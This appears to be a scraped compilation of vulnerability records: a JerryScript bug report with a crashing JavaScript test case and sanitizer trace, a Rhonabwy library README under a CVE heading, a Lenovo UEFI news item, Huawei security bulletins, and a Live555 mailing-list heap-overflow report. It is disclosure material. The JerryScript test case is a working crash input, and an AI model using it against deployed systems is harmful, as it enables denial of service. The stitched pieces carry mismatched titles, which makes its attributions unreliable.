Jerryscript v2.4.0 was discovered to contain a stack buffer overflow via the function jerryx_print_unhandled_exception in /util/print.c.

**JerryScript revision**

0d49696  
master

**Build platform**

Ubuntu 16.04.7 LTS (Linux 4.15.0-142-generic x86\_64)

**Build steps**

./tools/build.py --clean --compile-flag=-fsanitize=address --lto=off --error-message=on --profile=es.next --stack-limit=15 --debug --logging=on --line-info=on

**Test case**

for (let \_\_v1 \= 0; \_\_v1 < 10000; \_\_v1++) {
    \['\_\_v6', '\_\_v2', '\_\_v1', '\_\_v3', '\_\_v4', '\_\_v5'\];"    \_\_v5(\_\_v1, 
}

\==112046==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda03d5390 at pc 0x7fa6aae1ea7d bp 0x7ffda03d5240 sp 0x7ffda03d49e8
READ of size 1 at 0x7ffda03d5390 thread T0
    #0 0x7fa6aae1ea7c in \_\_interceptor\_strtol (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x75a7c)
    #1 0x581203 in jerryx\_print\_unhandled\_exception /home/lily/Desktop/67/jerryscript/jerry-ext/util/print.c:247
    #2 0x4027c1 in main /home/lily/Desktop/67/jerryscript/jerry-main/main-desktop.c:172
    #3 0x7fa6aa6f683f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)
    #4 0x401e88 in \_start (/home/lily/Desktop/67/jerry+0x401e88)

Address 0x7ffda03d5390 is located in stack of thread T0 at offset 224 in frame
    #0 0x580e99 in jerryx\_print\_unhandled\_exception /home/lily/Desktop/67/jerryscript/jerry-ext/util/print.c:204

  This frame has 3 object(s):
    \[32, 36) 'source\_size'
    \[96, 104) 'current\_p'
    \[160, 224) 'buffer\_p' <== Memory access at offset 224 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions \*are\* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 \_\_interceptor\_strtol
Shadow bytes around the buggy address:
  0x100034072a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072a50: 00 00 00 00 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2
  0x100034072a60: f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00
=\>0x100034072a70: 00 00\[f3\]f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00
  0x100034072a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034072ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==112046==ABORTING

CVE-2022-32117: Stack-buffer-overflow  in jerryx_print_unhandled_exception (jerryscript/jerry-ext/util/print.c) · Issue #5008 · jerryscript-project/jerryscript

Rhonabwy before v1.1.5 was discovered to contain a buffer overflow via the component r_jwe_aesgcm_key_unwrap. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted JWE token.

**Rhonabwy - Javascript Object Signing and Encryption (JOSE) library - JWK, JWKS, JWS, JWE and JWT**

 

*   Create, modify, parse, import or export JSON Web Keys (JWK) and JSON Web Keys Set (JWKS)
*   Create, modify, parse, validate or serialize JSON Web Signatures (JWS)
*   Create, modify, parse, validate or serialize JSON Web Encryption (JWE)
*   Create, modify, parse, validate or serialize JSON Web Token (JWT)

JWT Relies on JWS and JWE functions, so it supports the same functionalities as the other 2. JWT functionalities also support nesting serialization (JWE nested in a JWS or the opposite).

*   Supported Cryptographic Algorithms (alg) for Digital Signatures and MACs:

"alg" Param Value

Digital Signature or MAC Algorithm

Supported

HS256

HMAC using SHA-256

**YES**

HS384

HMAC using SHA-384

**YES**

HS512

HMAC using SHA-512

**YES**

RS256

RSASSA-PKCS1-v1\_5 using SHA-256

**YES**

RS384

RSASSA-PKCS1-v1\_5 using SHA-384

**YES**

RS512

RSASSA-PKCS1-v1\_5 using SHA-512

**YES**

ES256

ECDSA using P-256 and SHA-256

**YES**(1)

ES384

ECDSA using P-384 and SHA-384

**YES**(1)

ES512

ECDSA using P-521 and SHA-512

**YES**(1)

PS256

RSASSA-PSS using SHA-256 and MGF1 with SHA-256

**YES**(1)

PS384

RSASSA-PSS using SHA-384 and MGF1 with SHA-384

**YES**(1)

PS512

RSASSA-PSS using SHA-512 and MGF1 with SHA-512

**YES**(1)

none

No digital signature or MAC performed

**YES**

EdDSA

Digital Signature with Ed25519 Elliptic Curve

**YES**(1)

ES256K

Digital Signature with secp256k1 Curve Key

_NO_

(1) GnuTLS 3.6 minimum is required for ECDSA, Ed25519 (EdDSA) and RSA-PSS signatures.

*   Supported Encryption Algorithm (enc) for JWE payload encryption:

"enc" Param Value

Content Encryption Algorithm

Supported

A128CBC-HS256

AES\_128\_CBC\_HMAC\_SHA\_256 authenticated encryption algorithm, as defined in Section 5.2.3

**YES**

A192CBC-HS384

AES\_192\_CBC\_HMAC\_SHA\_384 authenticated encryption algorithm, as defined in Section 5.2.4

**YES**

A256CBC-HS512

AES\_256\_CBC\_HMAC\_SHA\_512 authenticated encryption algorithm, as defined in Section 5.2.5

**YES**

A128GCM

AES GCM using 128-bit key

**YES**

A192GCM

AES GCM using 192-bit key

**YES** (2)

A256GCM

AES GCM using 256-bit key

**YES**

(2) GnuTLS 3.6.14 minimum is required for A192GCM enc.

*   Supported Cryptographic Algorithms (alg) for Key Management:

"alg" Param Value

Key Management Algorithm

Supported

RSA1\_5

RSAES-PKCS1-v1\_5

**YES**

RSA-OAEP

RSAES OAEP using default parameters

**YES**(3)

RSA-OAEP-256

RSAES OAEP using SHA-256 and MGF1 with SHA-256

**YES**

A128KW

AES Key Wrap with default initial value using 128-bit key

**YES**(3)

A192KW

AES Key Wrap with default initial value using 192-bit key

**YES**(3)

A256KW

AES Key Wrap with default initial value using 256-bit key

**YES**(3)

dir

Direct use of a shared symmetric key as the CEK

**YES**

ECDH-ES

Elliptic Curve Diffie-Hellman Ephemeral Static key agreement using Concat KDF

**YES**(4)

ECDH-ES+A128KW

ECDH-ES using Concat KDF and CEK wrapped with "A128KW"

**YES**(4)

ECDH-ES+A192KW

ECDH-ES using Concat KDF and CEK wrapped with "A192KW"

**YES**(4)

ECDH-ES+A256KW

ECDH-ES using Concat KDF and CEK wrapped with "A256KW"

**YES**(4)

A128GCMKW

Key wrapping with AES GCM using 128-bit key

**YES**

A192GCMKW

Key wrapping with AES GCM using 192-bit key

**YES**(5)

A256GCMKW

Key wrapping with AES GCM using 256-bit key

**YES**

PBES2-HS256+A128KW

PBES2 with HMAC SHA-256 and "A128KW" wrapping

**YES**(5)

PBES2-HS384+A192KW

PBES2 with HMAC SHA-384 and "A192KW" wrapping

**YES**(5)

PBES2-HS512+A256KW

PBES2 with HMAC SHA-512 and "A256KW" wrapping

**YES**(5)

(3) Nettle 3.4 minimum is required for RSA-OAEP and AES key Wrap

(4) Nettle 3.6 minimum is required for ECDH-ES

(5) GnuTLS 3.6.14 minimum is required for A192GCMKW, PBES2-HS256+A128KW, PBES2-HS384+A192KW and PBES2-HS512+A256KW key wrapping algorithms.

**rnbyc, Rhonabwy command-line tool**

This command-line program can be used to:

*   Generate and/or parse keys and output the result in a JWKS or a public/private pair of JWKS files.
*   Parse, decrypt, and/or verify signature of a JWT, using given key
*   Serialize a JWT, the JWT can be signed, encrypted or nested

Example commands to generate a RSA2048 key pair, serialize a JWT signed with the private key, then parse the serialized token and verifies the signature with the public key.

$ rnbyc -j -g RSA2048 -o priv.jwks -p pub.jwks
$ rnbyc -s '{"iss":"https://rhonabwy.tld","aud":"abcxyz1234"}' -K priv.jwks -a RS256
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6ImVNdnI3bktBX2I5QUI4NGpMU05zTFFKZHRmdHpadnllV2M1V0VVMjhnRFkifQ.eyJpc3MiOiJodHRwczovL3Job25hYnd5LnRsZCIsImF1ZCI6ImFiY3h5ejEyMzQifQ.j6v-yxcWvHhyLIc-r3Nzn5rCF9yeJJzgyLSHW\_10wREfckspbzf8UTof5Zsrwg8JvKNlJ4Tt4ZffJC4BkkehdBYXPrgcfq9NtvNYsRmAdiNJhOXtZCU9j9X89j2xhY7pRBgWENI9c3730cmAUgaC-IUKsoNRw\_dd-eboyrgYKIzUCYRnuwqDB31T2oUSVjy6CckoenyoeHJhHg-x384G-g4ovP1l-L4YpjgCyr6BR8mjBFwHU56MP6hNN299HpUd56usQ3vMn7z5hL6QqE92qz-SsJBySrv8whLWjjN9J4Wq5g3\_R7Qw00x60bFnuCDhPBjg3EPXXGqlI0x0vwgwHw
$ rnbyc -P pub.jwks -t eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6ImVNdnI3bktBX2I5QUI4NGpMU05zTFFKZHRmdHpadnllV2M1V0VVMjhnRFkifQ.eyJpc3MiOiJodHRwczovL3Job25hYnd5LnRsZCIsImF1ZCI6ImFiY3h5ejEyMzQifQ.j6v-yxcWvHhyLIc-r3Nzn5rCF9yeJJzgyLSHW\_10wREfckspbzf8UTof5Zsrwg8JvKNlJ4Tt4ZffJC4BkkehdBYXPrgcfq9NtvNYsRmAdiNJhOXtZCU9j9X89j2xhY7pRBgWENI9c3730cmAUgaC-IUKsoNRw\_dd-eboyrgYKIzUCYRnuwqDB31T2oUSVjy6CckoenyoeHJhHg-x384G-g4ovP1l-L4YpjgCyr6BR8mjBFwHU56MP6hNN299HpUd56usQ3vMn7z5hL6QqE92qz-SsJBySrv8whLWjjN9J4Wq5g3\_R7Qw00x60bFnuCDhPBjg3EPXXGqlI0x0vwgwHw
Token signature verified
{
  "iss": "https://rhonabwy.tld",
  "aud": "abcxyz1234"
}

Check its documentation

**API Documentation**

Documentation is available in the documentation page: https://babelouest.github.io/rhonabwy/

Example program to parse and verify the signature of a JWT using its public key in JWK format:

/\*\*
 \* To compile this program run:
 \* gcc -o demo\_rhonabwy demo\_rhonabwy.c -lrhonabwy
 \*/
#include <stdio.h\>
#include <rhonabwy.h\>

int main(void) {
  const char token\[\] = "eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiIsImtpZCI6IjEifQ."                                     // Header
                       "eyJzdHIiOiJwbG9wIiwiaW50Ijo0Miwib2JqIjp0cnVlfQ."                                         // Claims
                       "ooXNEt3JWFGMuvkGUM-szUOU1QTu4DvyC3qQP64UGeeJQuMGupBCVATnGkiqNLiPSJ9uBsjZbyUrWe8z7Iag\_A"; // Signature

  const char jwk\_pubkey\_ecdsa\_str\[\] = "{"
                                        "\\"kty\\":\\"EC\\","
                                        "\\"crv\\":\\"P-256\\","
                                        "\\"alg\\":\\"ES256\\","
                                        "\\"x\\":\\"MKBCTNIcKUSDii11ySs3526iDZ8AiTo7Tu6KPAqv7D4\\","
                                        "\\"y\\":\\"4Etl6SRW2YiLUrN5vfvVHuhp7x8PxltmWWlbbM4IFyM\\","
                                        "\\"kid\\":\\"1\\","
                                        "\\"use\\":\\"sig\\""
                                      "}";

  unsigned char output\[2048\];
  size\_t output\_len = 2048;
  jwk\_t \* jwk = NULL;
  jwt\_t \* jwt = NULL;
  char \* claims;

  if ((jwk = r\_jwk\_quick\_import(R\_IMPORT\_JSON\_STR, jwk\_pubkey\_ecdsa\_str)) != NULL && (jwt = r\_jwt\_quick\_parse(token, R\_PARSE\_NONE, 0)) != NULL) {
    if (r\_jwk\_export\_to\_pem\_der(jwk, R\_FORMAT\_PEM, output, &output\_len, 0) == RHN\_OK) {
      printf("Exported key:\\n%.\*s\\n", (int)output\_len, output);
      if (r\_jwt\_verify\_signature(jwt, jwk, 0) == RHN\_OK) {
        claims = r\_jwt\_get\_full\_claims\_str(jwt);
        printf("Verified payload:\\n%s\\n", claims);
        r\_free(claims);
      } else {
        fprintf(stderr, "Error r\_jwt\_verify\_signature\\n");
      }
    } else {
      fprintf(stderr, "Error r\_jwk\_export\_to\_pem\_der\\n");
    }
  } else {
    fprintf(stderr, "Error parsing\\n");
  }
  r\_jwk\_free(jwk);
  r\_jwt\_free(jwt);

  return 0;
}

**Installation**

Rhonabwy is available in the following distributions.

**Dependencies**

Rhonabwy is based on Nettle, GnuTLS, Jansson, zlib, libcurl and libsystemd (if possible), you must install those libraries first before building Rhonabwy.

You also need check and Ulfius to run the tests.

**Prerequisites**

You need Orcania and Yder.

Those libraries are included in the package rhonabwy-dev-full_{x.x.x}_{OS}_{ARCH}.tar.gz in the Latest release page. If you're building with CMake, they will be automatically downloaded and installed if missing.

**Pre-compiled packages**

You can install Rhonabwy with a pre-compiled package available in the release pages.

**rhonabwy-dev-full packages**

The rhonabwy-dev-full contain 4 different packages:

*   liborcania-dev\_x.x.x\_.ext
*   libyder-dev\_y.y.y\_.ext
*   libulfius-dev\_z.z.z\_.ext
*   librhonabwy-dev\_a.a.a\_.ext

You only need to install liborcania-dev_*, libyder-dev_* for librhonabwy-dev_* to work. libulfius-dev_* isn't required unless you want to run the test suite.

**Manual install****CMake - Multi architecture**

CMake minimum 3.5 is required.

Run the CMake script in a sub-directory, example:

$ git clone https://github.com/babelouest/rhonabwy.git
$ cd rhonabwy/
$ mkdir build
$ cd build
$ cmake ..
$ make && sudo make install

The available options for CMake are:

*   -DWITH_JOURNALD=[on|off] (default on): Build with journald (SystemD) support
*   -BUILD_RHONABWY_TESTING=[on|off] (default off): Build unit tests
*   -DINSTALL_HEADER=[on|off] (default on): Install header file rhonabwy.h
*   -DBUILD_RPM=[on|off] (default off): Build RPM package when running make package
*   -DCMAKE_BUILD_TYPE=[Debug|Release] (default Release): Compile with debugging symbols or not
*   -DBUILD_STATIC=[on|off] (default off): Compile static library
*   -DBUILD_RHONABWY_DOCUMENTATION=[on|off] (default off): Build documentation with doxygen
*   -DWITH_CURL=[on|off] (default on): Use libcurl to download remote content

**Good ol' Makefile**

Download Rhonabwy from GitHub repository, compile and install.

$ git clone https://github.com/babelouest/rhonabwy.git
$ cd rhonabwy/src
$ make
$ sudo make install

To disable curl library on build (to avoid its dependencies), you can pass the option DISABLE_CURL=1 to the make command.

$ cd rhonabwy/src
$ make DISABLE\_CURL=1
$ sudo make install

By default, the shared library and the header file will be installed in the /usr/local location. To change this setting, you can modify the DESTDIR value in the src/Makefile.

Example: install Rhonabwy in /tmp/lib directory

$ cd src
$ make && make DESTDIR=/tmp install

You can install Rhonabwy without root permission if your user has write access to $(DESTDIR). A ldconfig command is executed at the end of the install, it will probably fail if you don't have root permission, but this is harmless. If you choose to install Rhonabwy in another directory, you must set your environment variable LD_LIBRARY_PATH properly.

CVE-2022-32096: GitHub - babelouest/rhonabwy: Javascript Object Signing and Encryption (JOSE) library - JWK, JWKS, JWS, JWE and JWT

Consumer electronics maker Lenovo on Tuesday rolled out fixes to contain three security flaws in its UEFI firmware affecting over 70 product models.
"The vulnerabilities can be exploited to achieve arbitrary code execution in the early phases of the platform boot, possibly allowing the attackers to hijack the OS execution flow and disable some important security features," Slovak cybersecurity

Consumer electronics maker Lenovo on Tuesday rolled out fixes to contain three security flaws in its UEFI firmware affecting over 70 product models.

"The vulnerabilities can be exploited to achieve arbitrary code execution in the early phases of the platform boot, possibly allowing the attackers to hijack the OS execution flow and disable some important security features," Slovak cybersecurity firm ESET said in a series of tweets.

Tracked as CVE-2022-1890, CVE-2022-1891, and CVE-2022-1892, all three bugs relate to buffer overflow vulnerabilities that have been described by Lenovo as leading to privilege escalation on affected systems. Martin Smolár from ESET has been credited with reporting the flaws.

The bugs stem from an insufficient validation of an NVRAM variable called "DataSize" in three different drivers ReadyBootDxe, SystemLoadDefaultDxe, and SystemBootManagerDxe, leading to a buffer overflow that could be weaponized to achieve code execution.

This is the second time Lenovo has moved to address UEFI security vulnerabilities since the start of the year. In April, the company resolved three flaws (CVE-2021-3970, CVE-2021-3971, and CVE-2021-3972) — also discovered by Smolár — that could have been abused to deploy and execute firmware implants.

Users of impacted devices are highly recommended to update their firmware to the latest version to mitigate potential threats.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New UEFI Firmware Vulnerabilities Impact Several Lenovo Notebook Models

Vulnerability of pointers being incorrectly used during data transmission in the video framework. Successful exploitation of this vulnerability may affect confidentiality.

Title: HUAWEI EMUI/Magic UI security updates July 2022

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the June 2022 Android security bulletin:

Critical: CVE-2022-20130, CVE-2022-20145

High: CVE-2021-39691, CVE-2022-20006, CVE-2022-20134, CVE-2022-20135, CVE-2022-20142, CVE-2022-20143, CVE-2022-20141, CVE-2021-4154, CVE-2022-25375, CVE-2022-24958, CVE-2022-25258, CVE-2022-20132

Medium: CVE-2021-39806, CVE-2022-20197, CVE-2022-20201, CVE-2022-20202, CVE-2021-35118, CVE-2021-20268, CVE-2021-20321, CVE-2021-35121, CVE-2021-3635, CVE-2021-3715, CVE-2021-3743, CVE-2021-3753, CVE-2021-38160, CVE-2022-0492, CVE-2022-20148, CVE-2022-20166, CVE-2022-26966, CVE-2021-35119

Low: none

Already included in previous updates: CVE-2021-39803, CVE-2022-20007, CVE-2022-20109, CVE-2022-20110, CVE-2020-11307, CVE-2021-30264, CVE-2020-11263, CVE-2021-1894, CVE-2021-30272, CVE-2021-30274, CVE-2021-30275, CVE-2021-30278, CVE-2021-30279, CVE-2021-30282

※For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the following HUAWEI patches:

CVE-2021-40016: Improper permission control vulnerability in the Bluetooth module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2021-46741: Vulnerability of defects being introduced in the design process in the basic framework and settings module

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will affect integrity.

CVE-2021-40012: Vulnerability of pointers being incorrectly used during data transmission in the video framework

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect confidentiality.

CVE-2022-31751: Multi-thread competition for resources in the kernel emcom module

Severity: Critical

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability can affect availability.

CVE-2021-40013: Improper permission control vulnerability in the Bluetooth module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect integrity.

CVE-2022-34737: Incorrect permission assignment vulnerability in the application security module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality.

CVE-2022-31755: Improper preservation of permissions vulnerability in the communications module

Severity: Medium

Affected versions: EMUI 11.0.1

Impact: Successful exploitation of this vulnerability can affect availability.

CVE-2022-34736: Null pointer vulnerability in the frame scheduling module

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-34735: Null pointer vulnerability in the frame scheduling module

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-34739: Addition overflow vulnerability in the fingerprint sensor module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause the data of unknown addresses to be obtained from the address mapping.

CVE-2022-34742: Read/Write vulnerability in system components

Severity: High

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-34740: Buffer overflow vulnerability in the NFC module

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause exceptions in NFC card registration, deletion, and activation.

CVE-2022-34741: Buffer overflow vulnerability in the NFC module

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause exceptions in NFC card registration, deletion, and activation.

CVE-2022-31762: Input verification vulnerability in the AMS module

Severity: Medium

Affected versions: EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will cause unauthorized operations.

CVE-2022-34743: Out-of-bounds read vulnerability in the AT commands of the USB port

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may affect availability.

CVE-2022-34738: Permission control vulnerability in the SystemUI module

Severity: Medium

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will cause the service running in the background being unable to be perceived by the user.

CVE-2021-40012: July

There is a buffer overflow vulnerability in eSE620X vESS V100R001C10SPC200 and V100R001C20SPC200. An attacker can exploit this vulnerability by sending a specific message to the target device due to insufficient validation of packets. Successful exploit could cause a denial of service condition.

There is a buffer overflow vulnerability in DOPRA SSP products. An attacker can exploit this vulnerability by sending a specific message to the target device due to insufficient validation of packets. Successful exploit could cause a denial of service condition. (Vulnerability ID: HWPSIRT-2020-82332)  
This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2021-39999.  
Huawei has released software updates to fix this vulnerability. This advisory is available at the following link:  
http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20211201-01-buffer-en  

Product Name

Affected Version

Resolved Product and Version

eSE620X vESS

V100R001C10SPC200

V100R001C20SPC600

V100R001C20SPC200

  

Successful exploit could cause a denial of service condition.  

This vulnerability can be exploited only when the following conditions are present:

Attackers can send packets to the affected module.

Vulnerability details:

There is a buffer overflow vulnerability in DOPRA SSP products. An attacker can exploit this vulnerability by sending a specific message to the target device due to insufficient validation of packets. Successful exploit could cause a denial of service condition.

  

This vulnerability was discovered by Huawei internal tester.

  

Huawei adheres to protecting the ultimate interests of users with best efforts and the principle of responsible disclosure and deal with product security issues through our response mechanism.

To enjoy Huawei PSIRT services and obtain Huawei product vulnerability information, please visit http://www.huawei.com/en/psirt.

To report a security vulnerability in Huawei products and solutions, please send it to PSIRT@huawei.com. For details, please visit http://www.huawei.com/en/psirt/report-vulnerabilities.

This document is provided on an "AS IS" basis and does not imply any kind of guarantee or warranty, either express or implied, including the warranties of merchantability or fitness for a particular purpose. In no event shall Huawei or any of its directly or indirectly controlled subsidiaries or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. Your use of the document, by whatsoever means, will be totally at your own risk. Huawei is entitled to amend or update this document from time to time.

CVE-2021-39999: Security Advisory - Buffer Overflow Vulnerability in Some Huawei Products

Live555 through 1.08 does not handle socket connections properly. A huge number of incoming socket connections in a short time invokes the error-handling module, in which a heap-based buffer overflow happens. An attacker can leverage this to launch a DoS attack.

**Ba Jinsheng** bajinsheng at u.nus.edu  
_Wed Sep 8 22:28:48 PDT 2021_

*   Previous message (by thread): \[Live-devel\] Memory Leak in MPEGProgramStreamParser
*   Next message (by thread): \[Live-devel\] A Heap-overflow in FD\_ISSET
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

Hi,

There may be another similar overflow bug about the fd\_set in BasicUsageEnvironment/BasicTaskScheduler.cpp:115
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  for (int i = 0; i < 10000; ++i) {
    if (FD\_ISSET(i, &fReadSet) || FD\_ISSET(i, &fWriteSet) || FD\_ISSET(i, &fExceptionSet)) {
      fprintf(stderr, " %d(", i);
      if (FD\_ISSET(i, &fReadSet)) fprintf(stderr, "r");
      if (FD\_ISSET(i, &fWriteSet)) fprintf(stderr, "w");
      if (FD\_ISSET(i, &fExceptionSet)) fprintf(stderr, "e");
      fprintf(stderr, ")");
    }
  }
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
In default, the fd\_set should only support 1024 fds.
Sometimes, it incur the overflow as follow:

==13==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000000470 at pc 0x000000647338 bp 0x7ffff34b50d0 sp 0x7ffff34b50c8
READ of size 8 at 0x619000000470 thread T1
    #0 0x647337 in BasicTaskScheduler::SingleStep(unsigned int) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler.cpp:115:61
    #1 0x64ef1a in BasicTaskScheduler0::doEventLoop(char volatile\*) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler0.cpp:80:5
    #2 0x59bf95 in AC3AudioStreamParser::readAndSaveAFrame() /home/ubuntu/experiments/live555/liveMedia/AC3AudioStreamFramer.cpp:314:41
    #3 0x59bf95 in AC3AudioStreamFramer::samplingRate() /home/ubuntu/experiments/live555/liveMedia/AC3AudioStreamFramer.cpp:112:14
    #4 0x52b7f6 in AC3AudioFileServerMediaSubsession::createNewRTPSink(Groupsock\*, unsigned char, FramedSource\*) /home/ubuntu/experiments/live555/liveMedia/AC3AudioFileServerMediaSubsession.cpp:60:22
    #5 0x5e744e in OnDemandServerMediaSubsession::getStreamParameters(unsigned int, sockaddr\_storage const&, Port const&, Port const&, int, unsigned char, unsigned char, sockaddr\_storage&, unsigned char&, unsigned char&, Port&, Port&, void\*&) /home/ubuntu/experiments/live555/liveMedia/OnDemandServerMediaSubsession.cpp:168:6
    #6 0x4e412f in RTSPServer::RTSPClientSession::handleCmd\_SETUP\_afterLookup2(ServerMediaSession\*) /home/ubuntu/experiments/live555/liveMedia/RTSPServer.cpp:1514:17
    #7 0x4e0235 in RTSPServer::RTSPClientConnection::handleRequestBytes(int) /home/ubuntu/experiments/live555/liveMedia/RTSPServer.cpp:831:19
    #8 0x4d22be in GenericMediaServer::ClientConnection::incomingRequestHandler() /home/ubuntu/experiments/live555/liveMedia/GenericMediaServer.cpp:291:3
    #9 0x4d22be in GenericMediaServer::ClientConnection::incomingRequestHandler(void\*, int) /home/ubuntu/experiments/live555/liveMedia/GenericMediaServer.cpp:284:15
    #10 0x6469f5 in BasicTaskScheduler::SingleStep(unsigned int) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler.cpp:171:2
    #11 0x64ef1a in BasicTaskScheduler0::doEventLoop(char volatile\*) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler0.cpp:80:5
    #12 0x59bf95 in AC3AudioStreamParser::readAndSaveAFrame() /home/ubuntu/experiments/live555/liveMedia/AC3AudioStreamFramer.cpp:314:41
    #13 0x59bf95 in AC3AudioStreamFramer::samplingRate() /home/ubuntu/experiments/live555/liveMedia/AC3AudioStreamFramer.cpp:112:14
    #14 0x52b7f6 in AC3AudioFileServerMediaSubsession::createNewRTPSink(Groupsock\*, unsigned char, FramedSource\*) /home/ubuntu/experiments/live555/liveMedia/AC3AudioFileServerMediaSubsession.cpp:60:22
    #15 0x5e744e in OnDemandServerMediaSubsession::getStreamParameters(unsigned int, sockaddr\_storage const&, Port const&, Port const&, int, unsigned char, unsigned char, sockaddr\_storage&, unsigned char&, unsigned char&, Port&, Port&, void\*&) /home/ubuntu/experiments/live555/liveMedia/OnDemandServerMediaSubsession.cpp:168:6
    #16 0x4e412f in RTSPServer::RTSPClientSession::handleCmd\_SETUP\_afterLookup2(ServerMediaSession\*) /home/ubuntu/experiments/live555/liveMedia/RTSPServer.cpp:1514:17
    #17 0x4e0235 in RTSPServer::RTSPClientConnection::handleRequestBytes(int) /home/ubuntu/experiments/live555/liveMedia/RTSPServer.cpp:831:19
    #18 0x4d22be in GenericMediaServer::ClientConnection::incomingRequestHandler() /home/ubuntu/experiments/live555/liveMedia/GenericMediaServer.cpp:291:3
    #19 0x4d22be in GenericMediaServer::ClientConnection::incomingRequestHandler(void\*, int) /home/ubuntu/experiments/live555/liveMedia/GenericMediaServer.cpp:284:15
    #20 0x6469f5 in BasicTaskScheduler::SingleStep(unsigned int) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler.cpp:171:2
